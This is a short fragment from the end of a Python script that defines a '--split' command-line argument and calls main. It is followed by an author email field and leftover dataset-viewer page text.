parser.add_argument('--split',
default=1,
type=int,
help='split size of the data')
main(parser.parse_args())
| [
"sadistictornado@yahoo.co.jp"
] | sadistictornado@yahoo.co.jp |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.